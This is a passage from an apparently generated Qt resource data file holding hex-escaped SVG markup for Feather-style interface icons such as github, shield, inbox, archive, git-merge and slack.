\x62\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x39\x20\x31\
\x39\x63\x2d\x35\x20\x31\x2e\x35\x2d\x35\x2d\x32\x2e\x35\x2d\x37\
\x2d\x33\x6d\x31\x34\x20\x36\x76\x2d\x33\x2e\x38\x37\x61\x33\x2e\
\x33\x37\x20\x33\x2e\x33\x37\x20\x30\x20\x30\x20\x30\x2d\x2e\x39\
\x34\x2d\x32\x2e\x36\x31\x63\x33\x2e\x31\x34\x2d\x2e\x33\x35\x20\
\x36\x2e\x34\x34\x2d\x31\x2e\x35\x34\x20\x36\x2e\x34\x34\x2d\x37\
\x41\x35\x2e\x34\x34\x20\x35\x2e\x34\x34\x20\x30\x20\x30\x20\x30\
\x20\x32\x30\x20\x34\x2e\x37\x37\x20\x35\x2e\x30\x37\x20\x35\x2e\
\x30\x37\x20\x30\x20\x30\x20\x30\x20\x31\x39\x2e\x39\x31\x20\x31\
\x53\x31\x38\x2e\x37\x33\x2e\x36\x35\x20\x31\x36\x20\x32\x2e\x34\
\x38\x61\x31\x33\x2e\x33\x38\x20\x31\x33\x2e\x33\x38\x20\x30\x20\
\x30\x20\x30\x2d\x37\x20\x30\x43\x36\x2e\x32\x37\x2e\x36\x35\x20\
\x35\x2e\x30\x39\x20\x31\x20\x35\x2e\x30\x39\x20\x31\x41\x35\x2e\
\x30\x37\x20\x35\x2e\x30\x37\x20\x30\x20\x30\x20\x30\x20\x35\x20\
\x34\x2e\x37\x37\x61\x35\x2e\x34\x34\x20\x35\x2e\x34\x34\x20\x30\
\x20\x30\x20\x30\x2d\x31\x2e\x35\x20\x33\x2e\x37\x38\x63\x30\x20\
\x35\x2e\x34\x32\x20\x33\x2e\x33\x20\x36\x2e\x36\x31\x20\x36\x2e\
\x34\x34\x20\x37\x41\x33\x2e\x33\x37\x20\x33\x2e\x33\x37\x20\x30\
\x20\x30\x20\x30\x20\x39\x20\x31\x38\x2e\x31\x33\x56\x32\x32\x22\
\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x17\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x73\x68\x69\x65\x6c\
\x64\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x32\x20\
\x32\x32\x73\x38\x2d\x34\x20\x38\x2d\x31\x30\x56\x35\x6c\x2d\x38\
\x2d\x33\x2d\x38\x20\x33\x76\x37\x63\x30\x20\x36\x20\x38\x20\x31\
\x30\x20\x38\x20\x31\x30\x7a\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\
\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x1a\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x7a\x61\x70\x22\x3e\
\x3c\x70\x6f\x6c\x79\x67\x6f\x6e\x20\x70\x6f\x69\x6e\x74\x73\x3d\
\x22\x31\x33\x20\x32\x20\x33\x20\x31\x34\x20\x31\x32\x20\x31\x34\
\x20\x31\x31\x20\x32\x32\x20\x32\x31\x20\x31\x30\x20\x31\x32\x20\
\x31\x30\x20\x31\x33\x20\x32\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x67\
\x6f\x6e\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x6d\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x75\x73\x65\x72\x2d\
\x6d\x69\x6e\x75\x73\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\
\x4d\x31\x36\x20\x32\x31\x76\x2d\x32\x61\x34\x20\x34\x20\x30\x20\
\x30\x20\x30\x2d\x34\x2d\x34\x48\x35\x61\x34\x20\x34\x20\x30\x20\
\x30\x20\x30\x2d\x34\x20\x34\x76\x32\x22\x3e\x3c\x2f\x70\x61\x74\
\x68\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x38\x2e\
\x35\x22\x20\x63\x79\x3d\x22\x37\x22\x20\x72\x3d\x22\x34\x22\x3e\
\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\
\x31\x3d\x22\x32\x33\x22\x20\x79\x31\x3d\x22\x31\x31\x22\x20\x78\
\x32\x3d\x22\x31\x37\x22\x20\x79\x32\x3d\x22\x31\x31\x22\x3e\x3c\
\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x95\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x69\x6e\x62\x6f\x78\
\x22\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\
\x74\x73\x3d\x22\x32\x32\x20\x31\x32\x20\x31\x36\x20\x31\x32\x20\
\x31\x34\x20\x31\x35\x20\x31\x30\x20\x31\x35\x20\x38\x20\x31\x32\
\x20\x32\x20\x31\x32\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\
\x65\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x35\x2e\x34\x35\
\x20\x35\x2e\x31\x31\x4c\x32\x20\x31\x32\x76\x36\x61\x32\x20\x32\
\x20\x30\x20\x30\x20\x30\x20\x32\x20\x32\x68\x31\x36\x61\x32\x20\
\x32\x20\x30\x20\x30\x20\x30\x20\x32\x2d\x32\x76\x2d\x36\x6c\x2d\
\x33\x2e\x34\x35\x2d\x36\x2e\x38\x39\x41\x32\x20\x32\x20\x30\x20\
\x30\x20\x30\x20\x31\x36\x2e\x37\x36\x20\x34\x48\x37\x2e\x32\x34\
\x61\x32\x20\x32\x20\x30\x20\x30\x20\x30\x2d\x31\x2e\x37\x39\x20\
\x31\x2e\x31\x31\x7a\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\
\x73\x76\x67\x3e\
\x00\x00\x01\x81\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x61\x6d\x65\x72\
\x61\x2d\x6f\x66\x66\x22\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\
\x22\x31\x22\x20\x79\x31\x3d\x22\x31\x22\x20\x78\x32\x3d\x22\x32\
\x33\x22\x20\x79\x32\x3d\x22\x32\x33\x22\x3e\x3c\x2f\x6c\x69\x6e\
\x65\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x32\x31\x20\x32\
\x31\x48\x33\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x2d\x32\x2d\
\x32\x56\x38\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\x32\x2d\
\x32\x68\x33\x6d\x33\x2d\x33\x68\x36\x6c\x32\x20\x33\x68\x34\x61\
\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\x32\x20\x32\x76\x39\x2e\
\x33\x34\x6d\x2d\x37\x2e\x37\x32\x2d\x32\x2e\x30\x36\x61\x34\x20\
\x34\x20\x30\x20\x31\x20\x31\x2d\x35\x2e\x35\x36\x2d\x35\x2e\x35\
\x36\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\
\x00\x00\x01\x69\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x61\x72\x63\x68\x69\
\x76\x65\x22\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\
\x69\x6e\x74\x73\x3d\x22\x32\x31\x20\x38\x20\x32\x31\x20\x32\x31\
\x20\x33\x20\x32\x31\x20\x33\x20\x38\x22\x3e\x3c\x2f\x70\x6f\x6c\
\x79\x6c\x69\x6e\x65\x3e\x3c\x72\x65\x63\x74\x20\x78\x3d\x22\x31\
\x22\x20\x79\x3d\x22\x33\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\
\x32\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x35\x22\x3e\x3c\x2f\
\x72\x65\x63\x74\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\
\x30\x22\x20\x79\x31\x3d\x22\x31\x32\x22\x20\x78\x32\x3d\x22\x31\
\x34\x22\x20\x79\x32\x3d\x22\x31\x32\x22\x3e\x3c\x2f\x6c\x69\x6e\
\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x95\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x66\x6f\x6c\x64\x65\
\x72\x2d\x70\x6c\x75\x73\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\
\x22\x4d\x32\x32\x20\x31\x39\x61\x32\x20\x32\x20\x30\x20\x30\x20\
\x31\x2d\x32\x20\x32\x48\x34\x61\x32\x20\x32\x20\x30\x20\x30\x20\
\x31\x2d\x32\x2d\x32\x56\x35\x61\x32\x20\x32\x20\x30\x20\x30\x20\
\x31\x20\x32\x2d\x32\x68\x35\x6c\x32\x20\x33\x68\x39\x61\x32\x20\
\x32\x20\x30\x20\x30\x20\x31\x20\x32\x20\x32\x7a\x22\x3e\x3c\x2f\
\x70\x61\x74\x68\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\
\x32\x22\x20\x79\x31\x3d\x22\x31\x31\x22\x20\x78\x32\x3d\x22\x31\
\x32\x22\x20\x79\x32\x3d\x22\x31\x37\x22\x3e\x3c\x2f\x6c\x69\x6e\
\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x39\x22\x20\x79\
\x31\x3d\x22\x31\x34\x22\x20\x78\x32\x3d\x22\x31\x35\x22\x20\x79\
\x32\x3d\x22\x31\x34\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\
\x73\x76\x67\x3e\
\x00\x00\x01\x16\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x66\x72\x61\x6d\x65\
\x72\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x35\x20\x31\
\x36\x56\x39\x68\x31\x34\x56\x32\x48\x35\x6c\x31\x34\x20\x31\x34\
\x68\x2d\x37\x6d\x2d\x37\x20\x30\x6c\x37\x20\x37\x76\x2d\x37\x6d\
\x2d\x37\x20\x30\x68\x37\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\
\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x50\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x67\x69\x74\x2d\x6d\
\x65\x72\x67\x65\x22\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\
\x3d\x22\x31\x38\x22\x20\x63\x79\x3d\x22\x31\x38\x22\x20\x72\x3d\
\x22\x33\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x63\x69\
\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x36\x22\x20\x63\x79\x3d\x22\
\x36\x22\x20\x72\x3d\x22\x33\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\
\x65\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x36\x20\x32\x31\
\x56\x39\x61\x39\x20\x39\x20\x30\x20\x30\x20\x30\x20\x39\x20\x39\
\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x73\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x6c\x69\x70\x62\
\x6f\x61\x72\x64\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\
\x31\x36\x20\x34\x68\x32\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\
\x20\x32\x20\x32\x76\x31\x34\x61\x32\x20\x32\x20\x30\x20\x30\x20\
\x31\x2d\x32\x20\x32\x48\x36\x61\x32\x20\x32\x20\x30\x20\x30\x20\
\x31\x2d\x32\x2d\x32\x56\x36\x61\x32\x20\x32\x20\x30\x20\x30\x20\
\x31\x20\x32\x2d\x32\x68\x32\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\
\x3c\x72\x65\x63\x74\x20\x78\x3d\x22\x38\x22\x20\x79\x3d\x22\x32\
\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x38\x22\x20\x68\x65\x69\x67\
\x68\x74\x3d\x22\x34\x22\x20\x72\x78\x3d\x22\x31\x22\x20\x72\x79\
\x3d\x22\x31\x22\x3e\x3c\x2f\x72\x65\x63\x74\x3e\x3c\x2f\x73\x76\
\x67\x3e\
\x00\x00\x03\xe7\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x73\x6c\x61\x63\x6b\
\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x34\x2e\x35\
\x20\x31\x30\x63\x2d\x2e\x38\x33\x20\x30\x2d\x31\x2e\x35\x2d\x2e\
\x36\x37\x2d\x31\x2e\x35\x2d\x31\x2e\x35\x76\x2d\x35\x63\x30\x2d\
\x2e\x38\x33\x2e\x36\x37\x2d\x31\x2e\x35\x20\x31\x2e\x35\x2d\x31\
\x2e\x35\x73\x31\x2e\x35\x2e\x36\x37\x20\x31\x2e\x35\x20\x31\x2e\
\x35\x76\x35\x63\x30\x20\x2e\x38\x33\x2d\x2e\x36\x37\x20\x31\x2e\
\x35\x2d\x31\x2e\x35\x20\x31\x2e\x35\x7a\x22\x3e\x3c\x2f\x70\x61\
\x74\x68\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x32\x30\x2e\
\x35\x20\x31\x30\x48\x31\x39\x56\x38\x2e\x35\x63\x30\x2d\x2e\x38\
\x33\x2e\x36\x37\x2d\x31\x2e\x35\x20\x31\x2e\x35\x2d\x31\x2e\x35\
\x73\x31\x2e\x35\x2e\x36\x37\x20\x31\x2e\x35\x20\x31\x2e\x35\x2d\
\x2e\x36\x37\x20\x31\x2e\x35\x2d\x31\x2e\x35\x20\x31\x2e\x35\x7a\
\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x70\x61\x74\x68\x20\x64\
\x3d\x22\x4d\x39\x2e\x35\x20\x31\x34\x63\x2e\x38\x33\x20\x30\x20\
\x31\x2e\x35\x2e\x36\x37\x20\x31\x2e\x35\x20\x31\x2e\x35\x76\x35\
\x63\x30\x20\x2e\x38\x33\x2d\x2e\x36\x37\x20\x31\x2e\x35\x2d\x31\
\x2e\x35\x20\x31\x2e\x35\x53\x38\x20\x32\x31\x2e\x33\x33\x20\x38\
\x20\x32\x30\x2e\x35\x76\x2d\x35\x63\x30\x2d\x2e\x38\x33\x2e\x36\
\x37\x2d\x31\x2e\x35\x20\x31\x2e\x35\x2d\x31\x2e\x35\x7a\x22\x3e\
\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\
\x4d\x33\x2e\x35\x20\x31\x34\x48\x35\x76\x31\x2e\x35\x63\x30\x20\
\x2e\x38\x33\x2d\x2e\x36\x37\x20\x31\x2e\x35\x2d\x31\x2e\x35\x20\
\x31\x2e\x35\x53\x32\x20\x31\x36\x2e\x33\x33\x20\x32\x20\x31\x35\
